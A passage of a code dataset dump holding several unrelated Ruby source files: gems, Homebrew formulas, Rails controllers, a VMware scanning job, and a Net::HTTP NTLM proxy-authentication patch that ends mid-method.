hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
7a499efefef99466ffc7083ca4eb941c3fc0cb8c | 1,129 | # CVSS-Suite, a Ruby gem to manage the CVSS vector
#
# Copyright (c) Siemens AG, 2016
#
# Authors:
# Oliver Hambörger <[email protected]>
#
# This work is licensed under the terms of the MIT license.
# See the LICENSE.md file in the top-level directory.
require 'cvss_suite/cvss2/cvss2'
require 'cvss_suite/cvss3/cvss3'
require 'cvss_suite/version'
require 'cvss_suite/helpers/extensions'
require 'cvss_suite/errors'
require 'cvss_suite/invalid_cvss'
##
# Module of this gem.
module CvssSuite
CVSS_VECTOR_BEGINNINGS = [{:string => 'AV:', :version => 2}, {:string => 'CVSS:3.0/', :version => 3}]
##
# Returns a CVSS class by a +vector+.
def self.new(vector)
return InvalidCvss.new unless vector.is_a? String
@vector_string = vector
case version
when 2
Cvss2.new(@vector_string, version)
when 3
Cvss3.new(@vector_string, version)
else
InvalidCvss.new
end
end
private
def self.version
CVSS_VECTOR_BEGINNINGS.each do |beginning|
if @vector_string.start_with? beginning[:string]
return beginning[:version]
end
end
end
end
| 22.137255 | 103 | 0.69442 |
bb9af5be1d012f52a16dfd4da365ef33bcefaa8c | 6,347 | # -*- coding: utf-8 -*-
class RailsDataExplorer
class DataType
# This is an abstract class. Use sub_classes
#
# Responsibilities:
# * Provide available charts and statistics for quantitative data type.
# * Provide methods for quantitative data type.
#
# Collaborators:
# * DataSet
#
class Quantitative < DataType
def all_available_chart_types
[
# {
# chart_class: Chart::BoxPlot,
# chart_roles: [:y],
# dimensions_count_min: 1,
# dimensions_count_max: 1
# },
{
chart_class: Chart::HistogramQuantitative,
chart_roles: [:x],
dimensions_count_min: 1,
dimensions_count_max: 1
},
{
chart_class: Chart::BoxPlotGroup,
chart_roles: [:x],
dimensions_count_min: 2,
dimensions_count_max: 2,
},
{
chart_class: Chart::Scatterplot,
chart_roles: [:x, :y, :size],
dimensions_count_min: 2
},
{
chart_class: Chart::DescriptiveStatisticsTable,
chart_roles: [:any],
dimensions_count_min: 1,
dimensions_count_max: 1
},
{
chart_class: Chart::ParallelCoordinates,
chart_roles: [:dimension],
dimensions_count_min: 3,
},
].freeze
end
def descriptive_statistics(values)
non_nil_values = values.find_all { |e| !(e.nil? || Float::NAN == e) }
stats = ::DescriptiveStatistics::Stats.new(non_nil_values)
ruby_formatters = {
integer: Proc.new { |v|
v.nil? ? 'Null' : number_with_delimiter(v.round)
},
decimal: Proc.new { |v|
case
when v.nil?
'Null'
when v.is_a?(Float) && v.nan?
'NaN'
else
number_with_precision(
v,
precision: 3,
significant: true,
strip_insignificant_zeros: true,
delimiter: ','
)
end
},
pass_through: Proc.new { |v| (v.nil? || Float::NAN == v) ? 'NaN' : v },
}
[
{ label: 'Min', value: stats.min, ruby_formatter: ruby_formatters[:decimal], table_row: 1 },
{ label: '1%ile', value: stats.value_from_percentile(1), ruby_formatter: ruby_formatters[:decimal], table_row: 1 },
{ label: '5%ile', value: stats.value_from_percentile(5), ruby_formatter: ruby_formatters[:decimal], table_row: 1 },
{ label: '10%ile', value: stats.value_from_percentile(10), ruby_formatter: ruby_formatters[:decimal], table_row: 1 },
{ label: '25%ile', value: stats.value_from_percentile(25), ruby_formatter: ruby_formatters[:decimal], table_row: 1 },
{ label: 'Median', value: stats.median, ruby_formatter: ruby_formatters[:decimal], table_row: 1 },
{ label: '75%ile', value: stats.value_from_percentile(75), ruby_formatter: ruby_formatters[:decimal], table_row: 1 },
{ label: '90%ile', value: stats.value_from_percentile(90), ruby_formatter: ruby_formatters[:decimal], table_row: 1 },
{ label: '95%ile', value: stats.value_from_percentile(95), ruby_formatter: ruby_formatters[:decimal], table_row: 1 },
{ label: '99%ile', value: stats.value_from_percentile(99), ruby_formatter: ruby_formatters[:decimal], table_row: 1 },
{ label: 'Max', value: stats.max, ruby_formatter: ruby_formatters[:decimal], table_row: 1 },
{ label: 'Range', value: stats.range, ruby_formatter: ruby_formatters[:decimal], table_row: 2 },
{ label: 'Mean', value: stats.mean, ruby_formatter: ruby_formatters[:decimal], table_row: 2 },
{ label: 'Mode', value: stats.mode, ruby_formatter: ruby_formatters[:decimal], table_row: 2 },
{ label: 'Count', value: values.length, ruby_formatter: ruby_formatters[:integer], table_row: 2 },
{ label: 'Sum', value: non_nil_values.inject(0) { |m,e| m += e }, ruby_formatter: ruby_formatters[:decimal], table_row: 2 },
{ label: 'Variance', value: stats.variance, ruby_formatter: ruby_formatters[:decimal], table_row: 2 },
{ label: 'Std. dev.', value: stats.standard_deviation, ruby_formatter: ruby_formatters[:decimal], table_row: 2 },
{ label: 'Rel. std. dev.', value: stats.relative_standard_deviation, ruby_formatter: ruby_formatters[:decimal], table_row: 2 },
{ label: 'Skewness', value: stats.skewness, ruby_formatter: ruby_formatters[:decimal], table_row: 2 },
{ label: 'Kurtosis', value: stats.kurtosis, ruby_formatter: ruby_formatters[:decimal], table_row: 2 },
{ label: '', value: '', ruby_formatter: ruby_formatters[:pass_through], table_row: 2 },
]
end
# Returns an object that describes a statistics table.
def descriptive_statistics_table(values)
desc_stats = descriptive_statistics(values)
table = Utils::RdeTable.new([])
[1,2].each do |table_row|
table.rows << Utils::RdeTableRow.new(
:tr,
desc_stats.find_all { |e| table_row == e[:table_row] }.map { |stat|
Utils::RdeTableCell.new(:th, stat[:label], ruby_formatter: Proc.new { |e| e }, css_class: 'rde-cell-label')
},
css_class: 'rde-column_header'
)
table.rows << Utils::RdeTableRow.new(
:tr,
desc_stats.find_all { |e| table_row == e[:table_row] }.map { |stat|
Utils::RdeTableCell.new(:td, stat[:value], ruby_formatter: stat[:ruby_formatter], css_class: 'rde-cell-value')
},
css_class: 'rde-data_row'
)
end
table
end
def axis_tick_format(values)
raise "Implement me in sub_class"
end
def axis_scale(data_series, modification, d3_or_vega)
# Log scales can't handle 0 values
if data_series.min_val(modification) > 0.0 && data_series.has_large_dynamic_range?(modification)
{ d3: 'd3.scale.log', vega: 'log' }[d3_or_vega]
else
{ d3: 'd3.scale.linear', vega: 'linear' }[d3_or_vega]
end
end
end
end
end
| 43.176871 | 137 | 0.582795 |
6176311deefe1d5e853571809df703f2daafd82c | 933 | # encoding: UTF-8
# frozen_string_literal: true
module API
module V2
class Mount
get('/null') { '' }
get('/broken') { raise Error, code: 2_014_310, text: 'MtGox bankrupt' }
end
end
end
describe API::V2::Mount, type: :request do
let(:middlewares) { API::V2::Mount.middleware }
it 'should use auth and attack middleware' do
expect(middlewares.drop(1)).to eq [[:use, API::V2::Auth::Middleware], [:use, Rack::Attack]]
end
context 'handle exception on request processing' do
it 'should render json error message' do
get '/api/v2/broken'
expect(response.code).to eq '400'
expect(JSON.parse(response.body)).to eq('error' => { 'code' => 2_014_310, 'message' => 'MtGox bankrupt' })
end
end
context 'handle exception on request routing' do
it 'should render json error message' do
get '/api/v2/non/exist'
expect(response.code).to eq '404'
end
end
end
| 27.441176 | 112 | 0.648446 |
4a0687d1ebc63e46704f474eecede0dddf4437a0 | 868 | class Bingrep < Formula
desc "Greps through binaries from various OSs and architectures"
homepage "https://github.com/m4b/bingrep"
url "https://github.com/m4b/bingrep/archive/v0.8.2.tar.gz"
sha256 "5647d78166a2d768b98ae03bd40427f2263b28b81213882d42f638c5b96619e2"
license "MIT"
bottle do
cellar :any_skip_relocation
sha256 "38cb293ea71d8d11e422838e378cb67b09334590ed501e45b9a0f6da7d70f3ac" => :catalina
sha256 "cef323546a1e6978ca5a67f9f18333819e318bbe136d9ba210c1fbd89f4af82f" => :mojave
sha256 "d63ae62eff912723629b9d991fb77771f700ee306cf3b3cc40a934e3f2f13dd1" => :high_sierra
sha256 "82493ec0332b42ccaa1cf0a4415517a986cb4edcdad43e9edfd04da557c7684f" => :x86_64_linux
end
depends_on "rust" => :build
def install
system "cargo", "install", *std_cargo_args
end
test do
system bin/"bingrep", bin/"bingrep"
end
end
| 33.384615 | 94 | 0.786866 |
abc0561361f33be3694b05192155216f510fa558 | 75 | require "movement/version"
module Movement
# Your code goes here...
end
| 12.5 | 26 | 0.733333 |
f8e76ff1613dc6558660fa7b5e6450b3ffeb2eaf | 39 | module Sengiri
VERSION = "0.1.0"
end
| 9.75 | 19 | 0.666667 |
87dc27ec73915f9184e91ad60b662038199d126c | 2,086 | # frozen_string_literal: true
require "guard/cli/environments/bundler"
require "guard/commander"
require "guard/guardfile/generator"
module Guard
module Cli
module Environments
class Valid
def initialize(options)
@options = options
end
def start_guard
# TODO: just to make sure tests are ok
Bundler.new.verify unless @options[:no_bundler_warning]
Guard.start(@options)
rescue Dsl::Error,
Guardfile::Evaluator::NoPluginsError,
Guardfile::Evaluator::NoGuardfileError,
Guardfile::Evaluator::NoCustomGuardfile => e
# catch to throw message instead of call stack
UI.error(e.message)
abort
end
def initialize_guardfile(plugin_names = [])
bare = @options[:bare]
Guard.init(@options)
session = Guard.state.session
generator = Guardfile::Generator.new
begin
Guardfile::Evaluator.new(session.evaluator_options).evaluate
rescue Guardfile::Evaluator::NoGuardfileError
generator.create_guardfile
rescue Guard::Guardfile::Evaluator::NoPluginsError
# Do nothing - just the error
end
return 0 if bare # 0 - exit code
# Evaluate because it might have existed and creating was skipped
begin
Guardfile::Evaluator.new(session.evaluator_options).evaluate
rescue Guard::Guardfile::Evaluator::NoPluginsError
end
begin
if plugin_names.empty?
generator.initialize_all_templates
else
plugin_names.each do |plugin_name|
generator.initialize_template(plugin_name)
end
end
rescue Guardfile::Generator::Error => e
UI.error(e.message)
return 1
end
# TODO: capture exceptions to show msg and return exit code on
# failures
0 # exit code
end
end
end
end
end
| 28.972222 | 75 | 0.59348 |
617458c5dda722a8912bcb923a84ced01aa1fe85 | 2,180 | class Duff < Formula
desc "Quickly find duplicates in a set of files from the command-line"
homepage "https://duff.sourceforge.io/"
url "https://downloads.sourceforge.net/project/duff/duff/0.5.2/duff-0.5.2.tar.gz"
sha256 "15b721f7e0ea43eba3fd6afb41dbd1be63c678952bf3d80350130a0e710c542e"
bottle do
sha256 cellar: :any_skip_relocation, arm64_monterey: "668a1d24b8d48ec315a92dff088af45703c461c93fb8b865ff76eb7e932eab03"
sha256 cellar: :any_skip_relocation, arm64_big_sur: "a56fadd23b68f73dc6800cb2d13435b8bc8893b3b1cf3ce48660663840cab8a9"
sha256 cellar: :any_skip_relocation, monterey: "486d0ff26e56d7a23692b429a3441d965f61bf8e48038f5d582c9a0da5c6379e"
sha256 cellar: :any_skip_relocation, big_sur: "37eec490b6068cb6cb98f430740042712203e2bd2db39bfe25eeb5143f444965"
sha256 cellar: :any_skip_relocation, catalina: "9c383331f4c0f5f8efb8364079dd76994d6e210e4bdd4d6f8e96c53d55ee88d0"
sha256 cellar: :any_skip_relocation, mojave: "b2f5b9c19bb74d92c6b43482b77bf6d852355b83ddfda7ca4f6340a8075067f4"
sha256 cellar: :any_skip_relocation, high_sierra: "a30c57c79b3cef30518fccc5227e954dd9a2383e15458f85706733dcc1fe188a"
sha256 cellar: :any_skip_relocation, sierra: "2af1262a9b02e687c0efc14eed3d837920ab746fe8fca9b12b9361c4729f06ef"
sha256 cellar: :any_skip_relocation, el_capitan: "8a469e92a6303d80752ebc80ade382261d263b9c7226ca6652eddc8954e5ff2f"
sha256 cellar: :any_skip_relocation, yosemite: "927ba61ce39cf9be33f796197063b1a6865bbc2db2f4b1340ad6786acf0494df"
sha256 x86_64_linux: "d2e177f7c17a8dad92be2c7597844a572e4db8a8c4bba5db934843325c5edc90"
end
def install
system "./configure", "--disable-dependency-tracking",
"--prefix=#{prefix}",
"--mandir=#{man}"
system "make", "install"
end
test do
expected = <<~EOS
2 files in cluster 1 (6 bytes, digest 8843d7f92416211de9ebb963ff4ce28125932878)
cmp1
cmp2
EOS
(testpath/"cmp1").write "foobar"
(testpath/"cmp2").write "foobar"
assert_equal expected, shell_output("#{bin}/duff cmp1 cmp2")
end
end
| 53.170732 | 123 | 0.758257 |
080bc3b23e7b3493bb970eefe7ef7dbc7adf9d30 | 916 | class RoastsController < ApplicationController
def index
roasts = Roaster.find(params[:roaster_id]).roast
render json: { status: 200, roasts: roasts }
end
def new
roast = Roast.new
end
def destroy
roaster = Roaster.find(params[:roaster_id])
roast = roaster.roast.find(params[:id])
roast.destroy
redirect_to roaster_path(roaster)
end
def update
roast = Roast.find(params[:id])
roast.update(roast_params)
render(json: { roast: roast })
end
def create
roaster = Roaster.find(params[:roaster_id])
roast = roaster.roast.create(roast_params)
redirect_to roaster_path(roaster)
end
def show
@roasts = Roast.find(params[:id])
render json: { status: 200, roast: @roasts }
end
private
def roast_params
params.permit(:name, :picture, :notes, :origin, :description, :roaster_id, :beanType, :productionDate, :published)
end
end
| 21.809524 | 118 | 0.684498 |
ab7301fc6c16bafac69cd894d1ebe7074000c91d | 9,385 | class ManageIQ::Providers::Vmware::InfraManager::Scanning::Job < VmScan
# Make updates to default state machine to take into account snapshots
def load_transitions
super.tap do |transitions|
transitions.merge!(
:start_snapshot => {'before_scan' => 'snapshot_create'},
:snapshot_complete => {'snapshot_create' => 'check_host_credentials',
'snapshot_delete' => 'synchronizing'},
:start_scan => {'check_host_credentials' => 'scanning'},
:snapshot_delete => {'after_scan' => 'snapshot_delete'},
:data => {'snapshot_create' => 'scanning',
'scanning' => 'scanning',
'snapshot_delete' => 'snapshot_delete',
'synchronizing' => 'synchronizing',
'finished' => 'finished'}
)
end
end
def before_scan
queue_signal(:start_snapshot, role: "ems_operations", queue_name: vm.queue_name_for_ems_operations)
end
def after_scan
queue_signal(:snapshot_delete, role: "ems_operations", queue_name: vm.queue_name_for_ems_operations)
end
def call_snapshot_create
_log.info("Enter")
begin
context[:snapshot_mor] = nil
options[:snapshot] = :skipped
options[:use_existing_snapshot] = false
begin
proxy = MiqServer.find(miq_server_id)
if proxy && proxy.forceVmScan
options[:snapshot] = :smartProxy
_log.info("Skipping snapshot creation, it will be performed by the SmartProxy")
context[:snapshot_mor] = options[:snapshot_description] = snapshotDescription("(embedded)")
log_start_user_event_message
else
set_status("Creating VM snapshot")
return unless create_snapshot
end
end
signal(:snapshot_complete)
rescue Timeout::Error
msg = case options[:snapshot]
when :smartProxy, :skipped then "Request to log snapshot user event with EMS timed out."
else "Request to create snapshot timed out"
end
_log.error(msg)
signal(:abort, msg, "error")
rescue => err
_log.log_backtrace(err)
signal(:abort, err.message, "error")
end
end
def check_host_credentials
_log.info("Enter")
begin
host = MiqServer.find(miq_server_id)
# Send down metadata to allow the host to make decisions.
scan_args = create_scan_args
options[:ems_list] = scan_args["ems"]
options[:categories] = vm.scan_profile_categories(scan_args["vmScanProfiles"])
# If the host supports VixDisk Lib then we need to validate that the host has the required credentials set.
ems_list = scan_args["ems"]
scan_ci_type = ems_list['connect_to']
if host.is_vix_disk? && ems_list[scan_ci_type] && (ems_list[scan_ci_type][:username].nil? || ems_list[scan_ci_type][:password].nil?)
context[:snapshot_mor] = nil unless options[:snapshot] == :created
raise _("no credentials defined for %{type} %{name}") % {:type => scan_ci_type,
:name => ems_list[scan_ci_type][:hostname]}
end
if ems_list[scan_ci_type]
_log.info("[#{host.name}] communicates with [#{scan_ci_type}:#{ems_list[scan_ci_type][:hostname]}"\
"(#{ems_list[scan_ci_type][:address]})] to scan vm [#{vm.name}]")
end
signal(:start_scan)
rescue Timeout::Error
message = "timed out attempting to scan, aborting"
_log.error(message)
signal(:abort, message, "error")
return
rescue => message
_log.log_backtrace(message)
signal(:abort, message.message, "error")
end
end
def config_snapshot
snapshot = {"use_existing" => options[:use_existing_snapshot],
"description" => options[:snapshot_description]}
snapshot['create_free_percent'] = ::Settings.snapshots.create_free_percent
snapshot['remove_free_percent'] = ::Settings.snapshots.remove_free_percent
snapshot['name'] = context[:snapshot_mor]
snapshot
end
def create_scan_args
super.tap do |scan_args|
scan_args['snapshot'] = config_snapshot
scan_args['snapshot']['forceFleeceDefault'] = false if vm.scan_via_ems? && vm.template?
end
end
def call_snapshot_delete
_log.info("Enter")
# TODO: remove snapshot here if Vm was running
if context[:snapshot_mor]
mor = context[:snapshot_mor]
context[:snapshot_mor] = nil
if options[:snapshot] == :smartProxy
set_status("Snapshot delete was performed by the SmartProxy")
else
set_status("Deleting VM snapshot: reference: [#{mor}]")
end
if vm.ext_management_system
_log.info("Deleting snapshot: reference: [#{mor}]")
begin
delete_snapshot(mor)
rescue Timeout::Error
msg = "Request to delete snapshot timed out"
_log.error(msg)
rescue => err
_log.error(err.to_s)
return
end
unless options[:snapshot] == :smartProxy
_log.info("Deleted snapshot: reference: [#{mor}]")
set_status("Snapshot deleted: reference: [#{mor}]")
end
else
_log.error("Deleting snapshot: reference: [#{mor}], No Providers available to delete snapshot")
set_status("No Providers available to delete snapshot, skipping", "error")
end
else
set_status("Snapshot was not taken, delete not required") if options[:snapshot] == :skipped
log_end_user_event_message
end
signal(:snapshot_complete)
end
def delete_snapshot(mor)
if mor
begin
if vm.ext_management_system
if options[:snapshot] == :smartProxy
log_end_user_event_message
delete_snapshot_by_description(mor)
else
user_event = end_user_event_message
vm.ext_management_system.vm_remove_snapshot(vm, :snMor => mor, :user_event => user_event)
end
else
raise _("No Providers available to delete snapshot")
end
rescue => err
_log.error(err.message)
_log.log_backtrace(err, :debug)
end
else
log_end_user_event_message
end
end
def delete_snapshot_by_description(mor)
if mor
ems_type = 'host'
options[:ems_list] = vm.ems_host_list
miqVimHost = options[:ems_list][ems_type]
miqVim = nil
# Make sure we were given a host to connect to and have a non-nil encrypted password
if miqVimHost && !miqVimHost[:password].nil?
server = miqVimHost[:hostname] || miqVimHost[:ipaddress]
begin
password_decrypt = ManageIQ::Password.decrypt(miqVimHost[:password])
require 'VMwareWebService/MiqVim'
miqVim = MiqVim.new(server, miqVimHost[:username], password_decrypt)
vimVm = miqVim.getVimVm(vm.path)
vimVm.removeSnapshotByDescription(mor, true) unless vimVm.nil?
ensure
vimVm.release if vimVm rescue nil
miqVim.disconnect unless miqVim.nil?
end
end
end
end
def process_cancel(*args)
begin
delete_snapshot_and_reset_snapshot_mor("canceling")
super
rescue => err
_log.log_backtrace(err)
end
super
end
def process_abort(*args)
begin
delete_snapshot_and_reset_snapshot_mor("aborting")
super
rescue => err
_log.log_backtrace(err)
end
super
end
def snapshot_complete
if state == 'check_host_credentials'
check_host_credentials
else
call_synchronize
end
end
# All other signals
alias_method :start_snapshot, :call_snapshot_create
alias_method :snapshot_delete, :call_snapshot_delete
private
def create_snapshot
if vm.ext_management_system
sn_description = snapshotDescription
_log.info("Creating snapshot, description: [#{sn_description}]")
user_event = start_user_event_message
options[:snapshot] = :server
begin
# TODO: should this be a vm method?
sn = vm.ext_management_system.vm_create_evm_snapshot(vm, :desc => sn_description, :user_event => user_event).to_s
rescue Exception => err
msg = "Failed to create evm snapshot with EMS. Error: [#{err.class.name}]: [#{err}]"
_log.error(msg)
return false
end
context[:snapshot_mor] = sn
_log.info("Created snapshot, description: [#{sn_description}], reference: [#{context[:snapshot_mor]}]")
set_status("Snapshot created: reference: [#{context[:snapshot_mor]}]")
options[:snapshot] = :created
options[:use_existing_snapshot] = true
return true
else
signal(:abort, "No Providers available to create snapshot, skipping", "error")
return false
end
end
def snapshotDescription(type = nil)
Snapshot.evm_snapshot_description(jobid, type)
end
def delete_snapshot_and_reset_snapshot_mor(log_verb)
unless context[:snapshot_mor].nil?
mor = context[:snapshot_mor]
context[:snapshot_mor] = nil
set_status("Deleting snapshot before #{log_verb} job")
delete_snapshot(mor)
end
end
end
| 33.280142 | 138 | 0.63154 |
2845190d428d1da68b539c2c062740c09cf7114f | 221 | class CreateStorePrices < ActiveRecord::Migration[5.1]
def change
create_table :store_prices do |t|
t.references :item
t.references :store
t.float :price
t.timestamps
end
end
end
| 18.416667 | 54 | 0.647059 |
f86992c41ce8e8f045acf097685ad0f2daa2bf1c | 346 | Spree::SubscriptionInterval.create( :name =>"1 Month", :times => 1, :time_unit => 3 )
Spree::SubscriptionInterval.create( :name =>"2 Months", :times => 2, :time_unit => 3 )
Spree::SubscriptionInterval.create( :name =>"3 Months", :times => 3, :time_unit => 3 )
Spree::SubscriptionInterval.create( :name =>"4 Months", :times => 4, :time_unit => 3 ) | 86.5 | 86 | 0.66763 |
18de3e700602c24dbc1a103f9ca531bfef0bf6c8 | 47 | class Class1
def method_of_class_1
end
end
| 9.4 | 23 | 0.787234 |
4a20f4aab5286b7efa63ebd2916086a7c3767044 | 1,529 | class <%= "#{file_name.capitalize+ "editor" + "Controller"}" %> < ApplicationController
def add_menu_form
@menu_id=params[:<%="#{file_name}"%>_id]
end
def add_menu
<%= file_name.capitalize %>.add_child(params[:<%="#{file_name}"%>_id].to_i, params[:title], params[:link])
<%= file_name.capitalize %>.determine_abs_position_and_depth
end
def publish_menu
m=<%= file_name.capitalize %>.find(params[:<%="#{file_name}"%>_id].to_i)
if(m.published)
m.setNotPublished
else
m.setPublished
end
end
def delete_menu
temp=<%= file_name.capitalize %>.find(params[:<%="#{file_name}"%>_id]).parent_id
<%= file_name.capitalize %>.delete_item(params[:<%="#{file_name}"%>_id].to_i)
<%= file_name.capitalize %>.determine_abs_position_and_depth
session[:<%="#{file_name}"%>_id]=temp
params[:<%="#{file_name}"%>_id]=temp
end
def edit_menu_form
@menu_id=params[:<%="#{file_name}"%>_id]
end
def edit_menu
<%= file_name.capitalize %>.edit(params[:<%="#{file_name}"%>_id].to_i, params[:parent_id].to_i, params[:title], params[:link])
<%= file_name.capitalize %>.determine_abs_position_and_depth
end
def up_menu
<%= file_name.capitalize %>.position_up(params[:<%="#{file_name}"%>_id].to_i)
<%= file_name.capitalize %>.determine_abs_position_and_depth
end
def down_menu
<%= file_name.capitalize %>.position_down(params[:<%="#{file_name}"%>_id].to_i)
<%= file_name.capitalize %>.determine_abs_position_and_depth
end
end
| 30.58 | 130 | 0.6586 |
ed70114d5c84618eb8abf65645cda93948324760 | 985 | class Librsync < Formula
desc "Library that implements the rsync remote-delta algorithm"
homepage "https://librsync.github.io/"
url "https://github.com/librsync/librsync/archive/v2.1.0.tar.gz"
sha256 "f701d2bab3d7471dfea60d29e9251f8bb7567222957f7195af55142cb207c653"
bottle do
cellar :any_skip_relocation
sha256 "addc0756351610330977decc0ae1b31c6f2928e527faef5d38230f623b88dc07" => :mojave
sha256 "9e813729589ad923be1fd040cd54a5c5083a824c05f09f7f8a77fc529a9516ce" => :high_sierra
sha256 "a4523e8193af9a30986f706d22d53b937d3ffc9c1bfa5fda05d54654a616a0ef" => :sierra
sha256 "f14d994d007af6c8217ba2ed616f89e82b1642dcc8ec2691a87d51e5de2e0179" => :x86_64_linux
end
depends_on "cmake" => :build
depends_on "popt"
def install
system "cmake", ".", *std_cmake_args
system "make", "install"
man1.install "doc/rdiff.1"
man3.install "doc/librsync.3"
end
test do
assert_match version.to_s, shell_output("#{bin}/rdiff -V")
end
end
| 33.965517 | 94 | 0.771574 |
2115d94ca0f1fac03d46adc91087bff513b9ec4c | 1,154 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'xcbuildfaster/version'
Gem::Specification.new do |spec|
spec.name = "XCBuildFaster"
spec.version = XCBuildFaster::VERSION
spec.authors = ["Dave Schukin"]
spec.email = ["[email protected]"]
spec.summary = %q{Tweaks your Xcode workspace to make it compile faster.}
spec.description = %q{Tweaks your Xcode workspace to make it compile faster.}
spec.homepage = "https://github.com/schukin/xcbuildfaster"
spec.license = "MIT"
spec.files = `git ls-files -z`.split("\x0")
spec.executables = ['xcbuildfaster'] #spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ["lib"]
spec.add_dependency 'xcodeproj'
spec.add_dependency 'libxml-ruby' # faster XML parsing w/ xcodeproj
spec.add_development_dependency "bundler", "~> 1.6"
spec.add_development_dependency "rake"
spec.add_development_dependency "rspec"
spec.add_development_dependency "rspec-nc"
end
| 38.466667 | 93 | 0.688042 |
ed453a4fcd819499f8d7da26bf86a8bcb807bd9a | 112 | #!/usr/bin/env ruby
puts $*[0][2..-1].split('').each_slice(2).map {|_| '0x%02X' % _.join.to_i(16) }.join(', ')
| 28 | 90 | 0.535714 |
1aad5c6502a6857dedfa59dbf2ad13a291490600 | 7,776 | require "net/http/proxy_authenticate_ntlm/version"
require "net/http"
require "net/https"
require "net/ntlm"
require "kconv"
# monkey patching Net::NTLM
class << Net::NTLM
def apply_des(plain, keys)
dec = OpenSSL::Cipher::DES.new
keys.map {|k|
dec.encrypt
dec.key = k
dec.update(plain)
}
end
end
module Net
class HTTP
module ProxyAuthenticateNTLM
def self.enabled?
@enabled
end
def self.enabled=(v)
@enabled = !!v
end
self.enabled = false
def request(req, body = nil, &block) # :yield: +response+
return super unless ProxyAuthenticateNTLM.enabled?
unless started?
start {
req['connection'] ||= 'close'
return request(req, body, &block)
}
end
req.set_body_internal body
res = transport_request(req, &block)
if sspi_auth?(res)
sspi_auth(req)
res = transport_request(req, &block)
elsif ntlm_auth?(res)
ntlm_auth(req)
res = transport_request(req, &block)
end
res
end
def connect
return super unless ProxyAuthenticateNTLM.enabled?
if proxy? then
conn_addr = proxy_address
conn_port = proxy_port
else
conn_addr = conn_address
conn_port = port
end
D "opening connection to #{conn_addr}:#{conn_port}..."
s = Timeout.timeout(@open_timeout, Net::OpenTimeout) {
begin
TCPSocket.open(conn_addr, conn_port, @local_host, @local_port)
rescue => e
raise e, "Failed to open TCP connection to " +
"#{conn_addr}:#{conn_port} (#{e.message})"
end
}
s.setsockopt(Socket::IPPROTO_TCP, Socket::TCP_NODELAY, 1)
D "opened"
if use_ssl?
if proxy?
connect_proxy(s, conn_address)
end
ssl_parameters = Hash.new
iv_list = instance_variables
SSL_IVNAMES.each_with_index do |ivname, i|
if iv_list.include?(ivname)
value = instance_variable_get(ivname)
unless value.nil?
ssl_parameters[SSL_ATTRIBUTES[i]] = value
end
end
end
@ssl_context = OpenSSL::SSL::SSLContext.new
@ssl_context.set_params(ssl_parameters)
@ssl_context.session_cache_mode =
OpenSSL::SSL::SSLContext::SESSION_CACHE_CLIENT |
OpenSSL::SSL::SSLContext::SESSION_CACHE_NO_INTERNAL_STORE
@ssl_context.session_new_cb = proc {|sock, sess| @ssl_session = sess }
D "starting SSL for #{conn_addr}:#{conn_port}..."
s = OpenSSL::SSL::SSLSocket.new(s, @ssl_context)
s.sync_close = true
# Server Name Indication (SNI) RFC 3546
s.hostname = @address if s.respond_to? :hostname=
if @ssl_session and
Process.clock_gettime(Process::CLOCK_REALTIME) < @ssl_session.time.to_f + @ssl_session.timeout
s.session = @ssl_session
end
ssl_socket_connect(s, @open_timeout)
if (@ssl_context.verify_mode != OpenSSL::SSL::VERIFY_NONE) && @ssl_context.verify_hostname
s.post_connection_check(@address)
end
D "SSL established, protocol: #{s.ssl_version}, cipher: #{s.cipher[0]}"
end
@socket = BufferedIO.new(s, read_timeout: @read_timeout,
write_timeout: @write_timeout,
continue_timeout: @continue_timeout,
debug_output: @debug_output)
on_connect
rescue => exception
if s
D "Conn close because of connect error #{exception}"
s.close
end
raise
end
private
def ntlm_auth?(res)
proxy_user && res.code.to_i == 407 && Array(res["Proxy-Authenticate"]).include?("NTLM")
end
def ntlm_auth(req)
negotiate_message = Net::NTLM::Message::Type1.new
req["Proxy-Authorization"] = "NTLM #{Base64.strict_encode64(negotiate_message.serialize)}"
req["Connection"] = "Keep-Alive"
req["Proxy-Connection"] = "Keep-Alive"
negotiate_response = transport_request(req)
authphrase = negotiate_response["Proxy-Authenticate"] or return res
challenge_message = Net::NTLM::Message::Type2.parse(Base64.strict_decode64(authphrase.gsub(/^NTLM /, "")))
authenticate_message = challenge_message.response(parse_proxy_user(proxy_user).merge(password: proxy_pass))
req["Proxy-Authorization"] = "NTLM #{Base64.strict_encode64(authenticate_message.serialize)}"
end
def connect_proxy(s, conn_address)
plain_sock = BufferedIO.new(s, read_timeout: @read_timeout,
write_timeout: @write_timeout,
continue_timeout: @continue_timeout,
debug_output: @debug_output)
buf = "CONNECT #{conn_address}:#{@port} HTTP/#{HTTPVersion}\r\n"
buf << "Host: #{@address}:#{@port}\r\n"
if proxy_user
credential = ["#{proxy_user}:#{proxy_pass}"].pack('m0')
buf << "Proxy-Authorization: Basic #{credential}\r\n"
end
buf << "\r\n"
plain_sock.write(buf)
HTTPResponse.read_new(plain_sock).value
# assuming nothing left in buffers after successful CONNECT response
rescue Net::HTTPServerException
if ntlm_auth?($!.response)
plain_sock.read($!.response["Content-Length"].to_i)
connect_proxy_with_ntlm_auth(s, conn_address)
else
raise
end
end
def connect_proxy_with_ntlm_auth(s, conn_address)
plain_sock = BufferedIO.new(s, read_timeout: @read_timeout,
write_timeout: @write_timeout,
continue_timeout: @continue_timeout,
debug_output: @debug_output)
negotiate_message = Net::NTLM::Message::Type1.new
plain_sock.write([
"CONNECT #{conn_address}:#{@port} HTTP/#{HTTPVersion}",
"Host: #{@address}:#{@port}",
"Proxy-Authorization: NTLM #{Base64.strict_encode64(negotiate_message.serialize)}",
"Proxy-Connection: Keep-Alive",
].join("\r\n") + "\r\n\r\n")
res = HTTPResponse.read_new(plain_sock)
begin
res.value
rescue Net::HTTPClientException
unless $!.response.code.to_i == 407
raise
end
if res["Content-Length"]
plain_sock.read(res["Content-Length"].to_i)
end
end
challenge_message = Net::NTLM::Message::Type2.parse(Base64.decode64(res["Proxy-Authenticate"].gsub(/^NTLM /, "")))
authenticate_message = challenge_message.response(parse_proxy_user(proxy_user).merge(password: proxy_pass))
plain_sock.write([
"CONNECT #{conn_address}:#{@port} HTTP/#{HTTPVersion}",
